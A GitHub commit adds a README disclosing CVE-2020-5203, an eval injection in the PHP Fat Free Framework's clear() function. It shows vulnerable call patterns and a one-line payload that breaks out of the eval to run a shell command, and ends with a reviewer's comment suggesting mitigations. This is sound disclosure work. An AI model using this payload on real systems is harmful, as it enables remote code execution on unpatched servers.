Commit
Showing 1 changed file with 35 additions and 0 deletions.
@@ -0,0 +1,35 @@ | ||
# CVE-2020-5203 | ||
|
||
This vulnerability was found during a penetration test for a company that uses the PHP Fat Free Framework. Responsible disclosure guidelines were followed, where a fix was issued by the company that hired me and the group behind the framework. | ||
|
||
## How it Works | ||
|
||
The exploitation depends on how the developer choose to use the vulnerable "Clear" function. For it to work, untrusted content must be passed to the function without any sanitization. | ||
|
||
Take the examples: | ||
|
||
<?php | ||
... includes | ||
$input = $_GET['session']; | ||
$f3->clear($input); // vulnerable | ||
$f3->clear($_GET['session']); // vulnerable | ||
$f3->clear("SESSION.".$_GET['session']); // vulnerable | ||
$f3->clear("SESSION.ABC"); // NOT vulnerable | ||
?> | ||
|
||
During my pentest, the application was setting session variables names with user controlled input, as one of the examples. | ||
|
||
The vulnerability exists because the function eventually passes the input to an eval, allowing malicious actors to "break" the structure to inject malicious code. | ||
|
||
The [FIX](https://github.com/bcosca/fatfree-core/commit/dae95a0baf3963a9ef87c17cee52f78f77e21829) for this vulnerability can help you better understand the flaw. | ||
|
||
## Exploit | ||
|
||
There are a few ways to exploit the eval for command execution, this one uses the backtick operator and breaks the execution format for our own code: | ||
|
||
0);echo `id`;print('' | ||
|
||
|
||
Thats it. | ||
|
||
Developers, remember that a framework is code as anything else. Don't think it won't have vulnerabilities just because a lot of people may use it, or just because it is open-source. |
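Review bot: the PHP example under "How it Works" (`<?php` through `?>`) and the payload line under "Exploit" are not inside fenced code blocks, so rendered Markdown will treat `<?php ... ?>` as raw markup (typically hidden) and the payload as ordinary text; wrap each in a ```php / ``` fence so readers see exactly what is and is not vulnerable. The write-up also never states which fatfree-core versions are affected or which release contains the linked fix, so a reader cannot tell whether their deployment is patched; add that next to the FIX link. It would also help defenders to state the mitigation explicitly, which the examples only imply: never pass user-controlled data to `clear()`, and if a session key must be derived from input, validate it against a fixed allowlist first (the `"SESSION.ABC"` case). Minor wording: "how the developer choose to use" should be "chooses", "session variables names" should be "session variable names", and "Thats it." should be "That's it."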